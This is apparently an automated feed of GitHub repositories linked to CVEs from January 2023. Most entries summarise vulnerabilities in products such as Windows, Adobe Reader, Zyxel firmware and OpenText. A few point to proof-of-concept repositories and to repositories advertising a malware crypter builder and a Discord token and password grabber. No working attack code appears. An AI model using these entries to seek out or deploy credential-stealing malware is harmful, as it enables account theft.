**Cachet is an open source status page system. Prior to version 2.5.1, authenticated users, regardless of their privileges (User or Admin), can leak the value of any configuration entry of the dotenv file, e.g. the application secret (`APP_KEY`) and various passwords (email, database, etc). This issue was addressed in ve CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-39174](https://github.com/Live-Hack-CVE/CVE-2021-39174) create time: 2023-01-19T06:38:32Z

**There is an incorrect buffer size calculation vulnerability in the video framework.Successful exploitation of this vulnerability may affect availability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-40052](https://github.com/Live-Hack-CVE/CVE-2021-40052) create time: 2023-01-19T06:37:45Z

**A use of incorrectly resolved name vulnerability fixed in 7.83.1 might remove the wrong file when `--no-clobber` is used together with `--remove-on-error`. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-27778](https://github.com/Live-Hack-CVE/CVE-2022-27778) create time: 2023-01-19T06:38:53Z

**In drivers/usb/gadget/udc/udc-xilinx.c in the Linux kernel before 5.16.12, the endpoint index is not validated and might be manipulated by the host for out-of-array access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-27223](https://github.com/Live-Hack-CVE/CVE-2022-27223) create time: 2023-01-19T06:37:51Z

**An integer underflow in the DDS loader of Blender leads to an out-of-bounds read, possibly allowing an attacker to read sensitive data using a crafted DDS image file. This flaw affects Blender versions prior to 2.83.19, 2.93.8 and 3.1. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-0544](https://github.com/Live-Hack-CVE/CVE-2022-0544) create time: 2023-01-19T06:37:40Z

**The DBLink module in PostgreSQL 8.2 before 8.2.6, 8.1 before 8.1.11, 8.0 before 8.0.15, 7.4 before 7.4.19, and 7.3 before 7.3.21, when local trust or ident authentication is used, allows remote attackers to gain privileges via unspecified vectors. NOTE: this issue exists because of an incomplete fix for CVE-2007-3278. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2007-6601](https://github.com/Live-Hack-CVE/CVE-2007-6601) create time: 2023-01-18T23:58:33Z

**A vulnerability was found in frioux ptome. It has been rated as critical. This issue affects some unknown processing. The manipulation leads to sql injection. The name of the patch is 26829bba67858ca0bd4ce49ad50e7ce653914276. It is recommended to apply a patch to fix this issue. The associated identifier of this vulner CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2010-10009](https://github.com/Live-Hack-CVE/CVE-2010-10009) create time: 2023-01-18T23:58:41Z

**Multiple exploitable buffer overflow vulnerabilities exist in the PubNub message handler for the "cc" channel of Insteon Hub running firmware version 1012. Specially crafted commands sent through the PubNub service can cause a stack-based buffer overflow overwriting arbitrary data. An attacker should send an authentica CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-16274](https://github.com/Live-Hack-CVE/CVE-2017-16274) create time: 2023-01-19T02:09:03Z

**The MOTD update script in the base-files package in Ubuntu 18.04 LTS before 10.1ubuntu2.2, and Ubuntu 18.10 before 10.1ubuntu6 incorrectly handled temporary files. A local attacker could use this issue to cause a denial of service, or possibly escalate privileges if kernel symlink restrictions were disabled. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-6557](https://github.com/Live-Hack-CVE/CVE-2018-6557) create time: 2023-01-18T23:58:26Z

**iTextPDF in iText 7 and up to 7.1.17 allows command injection via a CompareTool filename that is mishandled on the gs (aka Ghostscript) command line in GhostscriptHelper.java. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-43113](https://github.com/Live-Hack-CVE/CVE-2021-43113) create time: 2023-01-19T02:09:17Z

**Insufficient bounds checking in SEV-ES may allow an attacker to corrupt Reverse Map table (RMP) memory, potentially resulting in a loss of SNP (Secure Nested Paging) memory integrity. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-26409](https://github.com/Live-Hack-CVE/CVE-2021-26409) create time: 2023-01-18T23:58:21Z

**A randomly generated Initialization Vector (IV) may lead to a collision of IVs with the same key potentially resulting in information disclosure. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-26407](https://github.com/Live-Hack-CVE/CVE-2021-26407) create time: 2023-01-18T23:58:03Z

**Improper input validation and bounds checking in SEV firmware may leak scratch buffer bytes leading to potential information disclosure. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-26404](https://github.com/Live-Hack-CVE/CVE-2021-26404) create time: 2023-01-18T23:57:59Z

**CURRENTLY UNDER WORK... ALL I NEED TO IMPLEMENT IS JIT SPRAYING .....** : [SpiralBL0CK/CVE-2022-37332-RCE-](https://github.com/SpiralBL0CK/CVE-2022-37332-RCE-) create time: 2023-01-19T02:41:54Z

**An improper check for unusual or exceptional conditions in the HTTP request processing function of Zyxel GS1920-24v2 firmware prior to V4.70(ABMH.8)C0, which could allow an unauthenticated attacker to corrupt the contents of the memory and result in a denial-of-service (DoS) condition on a vulnerable device. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43393](https://github.com/Live-Hack-CVE/CVE-2022-43393) create time: 2023-01-19T02:09:58Z

**A buffer overflow vulnerability in the parameter of the CGI program in Zyxel NR7101 firmware prior to V1.15(ACCC.3)C0, which could allow an authenticated attacker to cause denial-of-service (DoS) conditions by sending a crafted HTTP request. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43391](https://github.com/Live-Hack-CVE/CVE-2022-43391) create time: 2023-01-19T02:09:52Z

**A remote OScript execution issue was discovered in OpenText Content Suite Platform 22.1 (16.2.19.1803). Multiple endpoints allow the user to pass the parameter htmlFile, which is included in the HTML output rendering pipeline of a request. Because the Content Server evaluates and executes Oscript code in HTML files, it CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45928](https://github.com/Live-Hack-CVE/CVE-2022-45928) create time: 2023-01-19T02:09:39Z

**An issue was discovered in OpenText Content Suite Platform 22.1 (16.2.19.1803). The endpoint notify.localizeEmailTemplate allows a low-privilege user to evaluate webreports. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45926](https://github.com/Live-Hack-CVE/CVE-2022-45926) create time: 2023-01-19T02:09:35Z

**An issue was discovered in OpenText Content Suite Platform 22.1 (16.2.19.1803). The action xmlexport accepts the parameter requestContext. If this parameter is present, the response includes most of the HTTP headers sent to the server and some of the CGI variables like remote_adde and server_name, which is an informati CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45925](https://github.com/Live-Hack-CVE/CVE-2022-45925) create time: 2023-01-19T02:09:31Z

**An issue was discovered in OpenText Content Suite Platform 22.1 (16.2.19.1803). The endpoint itemtemplate.createtemplate2 allows a low-privilege user to delete arbitrary files on the server's local filesystem. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45924](https://github.com/Live-Hack-CVE/CVE-2022-45924) create time: 2023-01-19T02:09:27Z

**An issue was discovered in OpenText Content Suite Platform 22.1 (16.2.19.1803). The request handler for ll.KeepAliveSession sets a valid AdminPwd cookie even when the Web Admin password was not entered. This allows access to endpoints, which require a valid AdminPwd cookie, without knowing the password. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45922](https://github.com/Live-Hack-CVE/CVE-2022-45922) create time: 2023-01-19T02:09:23Z

**Fuji Electric Tellus Lite V-Simulator versions 4.0.12.0 and prior are vulnerable to a stack-based buffer overflow which may allow an attacker to execute arbitrary code. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3085](https://github.com/Live-Hack-CVE/CVE-2022-3085) create time: 2023-01-19T02:09:08Z

**A buffer overflow vulnerability in the library of the web server in Zyxel NR7101 firmware prior to V1.15(ACCC.3)C0, which could allow an unauthenticated attacker to execute some OS commands or to cause denial-of-service (DoS) conditions on a vulnerable device. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43389](https://github.com/Live-Hack-CVE/CVE-2022-43389) create time: 2023-01-18T23:58:07Z

**undici is an HTTP/1.1 client, written from scratch for Node.js.`undici` is vulnerable to SSRF (Server-side Request Forgery) when an application takes in **user input** into the `path/pathname` option of `undici.request`. If a user specifies a URL such as `http://127.0.0.1` or `//127.0.0.1` ```js const undici = require( CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-35949](https://github.com/Live-Hack-CVE/CVE-2022-35949) create time: 2023-01-18T23:57:52Z

**RushBet version 2022.23.1-b490616d allows a remote attacker to steal customer accounts via use of a malicious application. This is possible because the application exposes an activity and does not properly validate the data it receives. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4235](https://github.com/Live-Hack-CVE/CVE-2022-4235) create time: 2023-01-18T23:57:39Z

**An issue was discovered in OpenText Content Suite Platform 22.1 (16.2.19.1803). The Java application server can be used to bypass the authentication of the QDS endpoints of the Content Server. These endpoints can be used to create objects and execute arbitrary code. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45927](https://github.com/Live-Hack-CVE/CVE-2022-45927) create time: 2023-01-18T23:57:36Z

**An issue was discovered in OpenText Content Suite Platform 22.1 (16.2.19.1803). The Common Gateway Interface (CGI) program cs.exe allows an attacker to increase/decrease an arbitrary memory address by 1 and trigger a call to a method of a vftable with a vftable pointer value chosen by the attacker. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45923](https://github.com/Live-Hack-CVE/CVE-2022-45923) create time: 2023-01-18T23:57:32Z

**Rapid7 Velociraptor allows users to be created with different privileges on the server. Administrators are generally allowed to run any command on the server including writing arbitrary files. However, lower privilege users are generally forbidden from writing or modifying files on the server. The VQL copy() function a CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0242](https://github.com/Live-Hack-CVE/CVE-2023-0242) create time: 2023-01-19T02:09:43Z

**In Sudo before 1.9.12p2, the sudoedit (aka -e) feature mishandles extra arguments passed in the user-provided environment variables (SUDO_EDITOR, VISUAL, and EDITOR), allowing a local attacker to append arbitrary entries to the list of files to process. This can lead to privilege escalation. Affected versions are 1.8.0 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22809](https://github.com/Live-Hack-CVE/CVE-2023-22809) create time: 2023-01-19T02:09:12Z

**Windows Kernel Information Disclosure Vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21776](https://github.com/Live-Hack-CVE/CVE-2023-21776) create time: 2023-01-18T23:58:37Z

**Windows Kernel Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2023-21675, CVE-2023-21747, CVE-2023-21748, CVE-2023-21749, CVE-2023-21750, CVE-2023-21754, CVE-2023-21755, CVE-2023-21772, CVE-2023-21773. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21774](https://github.com/Live-Hack-CVE/CVE-2023-21774) create time: 2023-01-18T23:58:15Z

**In the GrowthExperiments extension for MediaWiki through 1.39, the growthmanagementorlist API allows blocked users (blocked in ApiManageMentorList) to enroll as mentors or edit any of their mentorship-related properties. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22945](https://github.com/Live-Hack-CVE/CVE-2023-22945) create time: 2023-01-18T23:58:11Z

**Windows Bluetooth Driver Elevation of Privilege Vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21739](https://github.com/Live-Hack-CVE/CVE-2023-21739) create time: 2023-01-18T23:57:56Z

**Rapid7 Velociraptor did not properly sanitize the client ID parameter to the CreateCollection API, allowing a directory traversal in where the collection task could be written. It was possible to provide a client id of "../clients/server" to schedule the collection for the server (as a server artifact), but only requir CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0290](https://github.com/Live-Hack-CVE/CVE-2023-0290) create time: 2023-01-18T23:57:48Z

**OrangeScrum version 2.0.11 allows an authenticated external attacker to execute arbitrary commands on the server. This is possible because the application injects an attacker-controlled parameter into a system function. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0164](https://github.com/Live-Hack-CVE/CVE-2023-0164) create time: 2023-01-18T23:57:44Z

**Insufficient input validation in SVC_ECC_PRIMITIVE system call in a compromised user application or ABL may allow an attacker to corrupt ASP (AMD Secure Processor) OS memory which may lead to potential loss of integrity and availability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-46779](https://github.com/Live-Hack-CVE/CVE-2021-46779) create time: 2023-01-18T21:44:26Z

**The jokob-sk/Pi.Alert fork (before 22.12.20) of Pi.Alert allows Remote Code Execution via nmap_scan.php (scan parameter) OS Command Injection. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-48252](https://github.com/Live-Hack-CVE/CVE-2022-48252) create time: 2023-01-18T21:44:22Z

**Adobe Acrobat Reader versions 22.003.20282 (and earlier), 22.003.20281 (and earlier) and 20.005.30418 (and earlier) are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21606](https://github.com/Live-Hack-CVE/CVE-2023-21606) create time: 2023-01-18T21:45:07Z

**Adobe Acrobat Reader versions 22.003.20282 (and earlier), 22.003.20281 (and earlier) and 20.005.30418 (and earlier) are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21605](https://github.com/Live-Hack-CVE/CVE-2023-21605) create time: 2023-01-18T21:45:02Z

**Versions of Async HTTP Client prior to 1.13.2 are vulnerable to a form of targeted request manipulation called CRLF injection. This vulnerability was the result of insufficient validation of HTTP header field values before sending them to the network. Users are vulnerable if they pass untrusted data into HTTP header fi CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0040](https://github.com/Live-Hack-CVE/CVE-2023-0040) create time: 2023-01-18T21:44:58Z

**Windows Kernel Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2023-21675, CVE-2023-21748, CVE-2023-21749, CVE-2023-21750, CVE-2023-21754, CVE-2023-21755, CVE-2023-21772, CVE-2023-21773, CVE-2023-21774. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21747](https://github.com/Live-Hack-CVE/CVE-2023-21747) create time: 2023-01-18T21:44:53Z

**Windows NTLM Elevation of Privilege Vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21746](https://github.com/Live-Hack-CVE/CVE-2023-21746) create time: 2023-01-18T21:44:49Z

**Windows Kernel Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2023-21675, CVE-2023-21747, CVE-2023-21748, CVE-2023-21750, CVE-2023-21754, CVE-2023-21755, CVE-2023-21772, CVE-2023-21773, CVE-2023-21774. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21749](https://github.com/Live-Hack-CVE/CVE-2023-21749) create time: 2023-01-18T21:44:44Z

**Windows Kernel Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2023-21675, CVE-2023-21747, CVE-2023-21748, CVE-2023-21749, CVE-2023-21754, CVE-2023-21755, CVE-2023-21772, CVE-2023-21773, CVE-2023-21774. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21750](https://github.com/Live-Hack-CVE/CVE-2023-21750) create time: 2023-01-18T21:44:40Z

**Windows Kernel Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2023-21675, CVE-2023-21747, CVE-2023-21749, CVE-2023-21750, CVE-2023-21754, CVE-2023-21755, CVE-2023-21772, CVE-2023-21773, CVE-2023-21774. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21748](https://github.com/Live-Hack-CVE/CVE-2023-21748) create time: 2023-01-18T21:44:36Z

**Windows Kernel Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2023-21675, CVE-2023-21747, CVE-2023-21748, CVE-2023-21749, CVE-2023-21750, CVE-2023-21755, CVE-2023-21772, CVE-2023-21773, CVE-2023-21774. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21754](https://github.com/Live-Hack-CVE/CVE-2023-21754) create time: 2023-01-18T21:44:32Z

**Directory traversal vulnerability in index.php in phpSysInfo 2.5.1 allows remote attackers to determine the existence of arbitrary files via a .. (dot dot) sequence and a trailing null (%00) byte in the lng parameter, which will display a different error message if the file exists. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2006-3360](https://github.com/Live-Hack-CVE/CVE-2006-3360) create time: 2023-01-18T19:34:51Z

**A vulnerability was found in backdrop-contrib Basic Cart. It has been classified as problematic. Affected is the function basic_cart_checkout_form_submit of the file basic_cart.cart.inc. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. Upgrading to version 1.x-1.1.1 is able CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2012-10004](https://github.com/Live-Hack-CVE/CVE-2012-10004) create time: 2023-01-18T19:34:56Z

**A vulnerability, which was classified as critical, was found in ACI_Escola. This affects an unknown part. The manipulation leads to sql injection. The name of the patch is 34eed1f7b9295d1424912f79989d8aba5de41e9f. It is recommended to apply a patch to fix this issue. The identifier VDB-217965 was assigned to this vulne CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-10037](https://github.com/Live-Hack-CVE/CVE-2015-10037) create time: 2023-01-18T19:35:05Z

**A vulnerability was found in kylebebak dronfelipe. It has been declared as critical. Affected by this vulnerability is an unknown functionality. The manipulation leads to sql injection. The name of the patch is 87405b74fe651892d79d0dff62ed17a7eaef6a60. It is recommended to apply a patch to fix this issue. The associate CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-10036](https://github.com/Live-Hack-CVE/CVE-2015-10036) create time: 2023-01-18T19:35:01Z

**A vulnerability was found in dobos domino. It has been rated as critical. Affected by this issue is some unknown functionality in the library src/Complex.Domino.Lib/Lib/EntityFactory.cs. The manipulation leads to sql injection. Upgrading to version 0.1.5524.38553 is able to address this issue. The name of the patch is CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-10039](https://github.com/Live-Hack-CVE/CVE-2015-10039) create time: 2023-01-18T19:34:47Z

**A vulnerability was found in nym3r0s pplv2. It has been declared as critical. Affected by this vulnerability is an unknown functionality. The manipulation leads to sql injection. The name of the patch is 28f8b0550104044da09f04659797487c59f85b00. It is recommended to apply a patch to fix this issue. The associated ident CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-10038](https://github.com/Live-Hack-CVE/CVE-2015-10038) create time: 2023-01-18T19:33:54Z

**NVIDIA BMC contains a vulnerability in IPMI handler, where an authorized attacker can cause a buffer overflow and cause a denial of service or gain code execution CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42271](https://github.com/Live-Hack-CVE/CVE-2022-42271) create time: 2023-01-18T19:35:10Z

**Multiple Zoho ManageEngine on-premise products, such as ServiceDesk Plus through 14003, allow remote code execution due to use of Apache xmlsec (aka XML Security for Java) 1.4.1, because the xmlsec XSLT features, by design in that version, make the application responsible for certain security protections, and the Manag CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-47966](https://github.com/Live-Hack-CVE/CVE-2022-47966) create time: 2023-01-18T19:34:34Z

**Book Store Management System v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability in /bsms_ci/index.php/book. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the publisher parameter. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45613](https://github.com/Live-Hack-CVE/CVE-2022-45613) create time: 2023-01-18T19:34:29Z

**Windows Kernel Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2023-21675, CVE-2023-21747, CVE-2023-21748, CVE-2023-21749, CVE-2023-21750, CVE-2023-21754, CVE-2023-21755, CVE-2023-21772, CVE-2023-21774. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21773](https://github.com/Live-Hack-CVE/CVE-2023-21773) create time: 2023-01-18T19:35:14Z

**Adobe Dimension version 3.4.6 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21603](https://github.com/Live-Hack-CVE/CVE-2023-21603) create time: 2023-01-18T19:34:42Z

**Adobe Dimension version 3.4.6 (and earlier) are affected by a Use After Free vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21601](https://github.com/Live-Hack-CVE/CVE-2023-21601) create time: 2023-01-18T19:34:38Z

**Windows Smart Card Resource Management Server Security Feature Bypass Vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21759](https://github.com/Live-Hack-CVE/CVE-2023-21759) create time: 2023-01-18T19:34:24Z

**Windows Internet Key Exchange (IKE) Extension Denial of Service Vulnerability. This CVE ID is unique from CVE-2023-21677, CVE-2023-21683. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21758](https://github.com/Live-Hack-CVE/CVE-2023-21758) create time: 2023-01-18T19:34:21Z

**Windows Print Spooler Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2023-21678, CVE-2023-21765. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21760](https://github.com/Live-Hack-CVE/CVE-2023-21760) create time: 2023-01-18T19:34:16Z

**Microsoft Exchange Server Spoofing Vulnerability. This CVE ID is unique from CVE-2023-21745. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21762](https://github.com/Live-Hack-CVE/CVE-2023-21762) create time: 2023-01-18T19:34:12Z

**Microsoft Exchange Server Information Disclosure Vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21761](https://github.com/Live-Hack-CVE/CVE-2023-21761) create time: 2023-01-18T19:34:07Z

**Microsoft Exchange Server Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2023-21764. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21763](https://github.com/Live-Hack-CVE/CVE-2023-21763) create time: 2023-01-18T19:34:02Z

**Windows Layer 2 Tunneling Protocol (L2TP) Denial of Service Vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21757](https://github.com/Live-Hack-CVE/CVE-2023-21757) create time: 2023-01-18T19:33:50Z

**A vulnerability was found in iamdroppy phoenixcf. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file content/2-Community/articles.cfm. The manipulation leads to sql injection. The name of the patch is d156faf8bc36cd49c3b10d3697ef14167ad451d8. It is recommended to ap CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2011-10001](https://github.com/Live-Hack-CVE/CVE-2011-10001) create time: 2023-01-18T17:22:38Z

**A vulnerability classified as critical has been found in ale7714 sigeprosi. This affects an unknown part. The manipulation leads to sql injection. The name of the patch is 5291886f6c992316407c376145d331169c55f25b. It is recommended to apply a patch to fix this issue. The identifier VDB-218493 was assigned to this vulne CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2012-10006](https://github.com/Live-Hack-CVE/CVE-2012-10006) create time: 2023-01-18T17:22:42Z

**A vulnerability was found in AlexRed contentmap. It has been rated as critical. Affected by this issue is the function Load of the file contentmap.php. The manipulation of the argument contentid leads to sql injection. The name of the patch is dd265d23ff4abac97422835002c6a47f45ae2a66. It is recommended to apply a patch CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-20173](https://github.com/Live-Hack-CVE/CVE-2017-20173) create time: 2023-01-18T17:22:46Z

**lib/codebook.c in libvorbis before 1.3.6, as used in StepMania 5.0.12 and other products, has insufficient array bounds checking via a crafted OGG file. NOTE: this may overlap CVE-2018-5146. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-20412](https://github.com/Live-Hack-CVE/CVE-2020-20412) create time: 2023-01-18T17:23:04Z

**It is possible to manipulate the JWT token without the knowledge of the JWT secret and authenticate without valid JWT token as any user. This is happening only in the situation when zOSMF doesn’t have the APAR PH12143 applied. This issue affects: 1.16 versions to 1.19. What happens is that the services using the ZAAS c CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4314](https://github.com/Live-Hack-CVE/CVE-2021-4314) create time: 2023-01-18T17:22:51Z

**no description** : [NurSec747/CVE-2022-46104---POC](https://github.com/NurSec747/CVE-2022-46104---POC) create time: 2023-01-18T17:41:06Z

**Foxit PDF Reader and PDF Editor 11.2.1.53537 and earlier has an Out-of-Bounds Read vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-47881](https://github.com/Live-Hack-CVE/CVE-2022-47881) create time: 2023-01-18T17:23:50Z

**Dell Unisphere for PowerMax vApp, VASA Provider vApp, and Solution Enabler vApp version 9.2.3.x contain an information disclosure vulnerability. A low privileged remote attacker could potentially exploit this vulnerability, leading to read arbitrary files on the underlying file system. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45103](https://github.com/Live-Hack-CVE/CVE-2022-45103) create time: 2023-01-18T17:23:45Z

**** DISPUTED ** An access control issue in Harbor v1.X.X to v2.5.3 allows attackers to access public and private image repositories without authentication. NOTE: the vendor's position is that this "is clearly described in the documentation as a feature." CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-46463](https://github.com/Live-Hack-CVE/CVE-2022-46463) create time: 2023-01-18T17:23:00Z

**An issue in MatrixSSL 4.5.1-open and earlier leads to failure to securely check the SessionID field, resulting in the misuse of an all-zero MasterSecret that can decrypt secret data. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-46505](https://github.com/Live-Hack-CVE/CVE-2022-46505) create time: 2023-01-18T17:22:55Z

**The Custom 404 Pro plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 3.7.1. This is due to missing or incorrect nonce validation on the custom_404_pro_admin_init function. This makes it possible for unauthenticated attackers to delete logs, via forged request granted the CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0385](https://github.com/Live-Hack-CVE/CVE-2023-0385) create time: 2023-01-18T17:23:54Z

**Windows Malicious Software Removal Tool Elevation of Privilege Vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21725](https://github.com/Live-Hack-CVE/CVE-2023-21725) create time: 2023-01-18T17:23:41Z

**Windows Internet Key Exchange (IKE) Extension Denial of Service Vulnerability. This CVE ID is unique from CVE-2023-21677, CVE-2023-21758. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21683](https://github.com/Live-Hack-CVE/CVE-2023-21683) create time: 2023-01-18T17:23:35Z

**Microsoft DWM Core Library Elevation of Privilege Vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21724](https://github.com/Live-Hack-CVE/CVE-2023-21724) create time: 2023-01-18T17:23:31Z

**Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21768](https://github.com/Live-Hack-CVE/CVE-2023-21768) create time: 2023-01-18T17:23:26Z

**Windows Overlay Filter Elevation of Privilege Vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21767](https://github.com/Live-Hack-CVE/CVE-2023-21767) create time: 2023-01-18T17:23:21Z

**Windows Error Reporting Service Elevation of Privilege Vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21558](https://github.com/Live-Hack-CVE/CVE-2023-21558) create time: 2023-01-18T17:23:17Z

**Windows Point-to-Point Protocol (PPP) Information Disclosure Vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21682](https://github.com/Live-Hack-CVE/CVE-2023-21682) create time: 2023-01-18T17:23:13Z

**Windows Overlay Filter Information Disclosure Vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21766](https://github.com/Live-Hack-CVE/CVE-2023-21766) create time: 2023-01-18T17:23:08Z

**The personnummer implementation before 3.0.3 for Dart mishandles numbers in which the last four digits match the ^000[0-9]$ regular expression. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22963](https://github.com/Live-Hack-CVE/CVE-2023-22963) create time: 2023-01-18T17:22:33Z

**Microsoft Office Visio Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2023-21737, CVE-2023-21738. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21736](https://github.com/Live-Hack-CVE/CVE-2023-21736) create time: 2023-01-18T17:22:27Z

**Windows Kernel Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2023-21675, CVE-2023-21747, CVE-2023-21748, CVE-2023-21749, CVE-2023-21750, CVE-2023-21754, CVE-2023-21755, CVE-2023-21773, CVE-2023-21774. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-21772](https://github.com/Live-Hack-CVE/CVE-2023-21772) create time: 2023-01-18T17:22:22Z

**no description** : [FruitSnac/Jpg-Png-Exploit-Downloader-Fud-Cryter-Malware-Builder-Cve-2022](https://github.com/FruitSnac/Jpg-Png-Exploit-Downloader-Fud-Cryter-Malware-Builder-Cve-2022) create time: 2023-01-18T17:15:40Z

**no description** : [FruitSnac/Discord-Image-Token-Password-Grabber-Exploit-Cve-2022](https://github.com/FruitSnac/Discord-Image-Token-Password-Grabber-Exploit-Cve-2022) create time: 2023-01-18T17:15:16Z

**Update WINRE.WIM file to fix CVE-2022-41099** : [o0MattE0o/CVE-2022-41099-Fix](https://github.com/o0MattE0o/CVE-2022-41099-Fix) create time: 2023-01-16T08:57:29Z

